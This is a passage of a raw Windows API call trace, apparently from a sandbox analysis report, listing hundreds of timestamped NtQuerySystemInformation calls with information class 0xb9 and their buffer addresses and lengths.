SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0227.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x20, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.585] NtQuerySystemInformation (SystemInformationClass=0xb9, 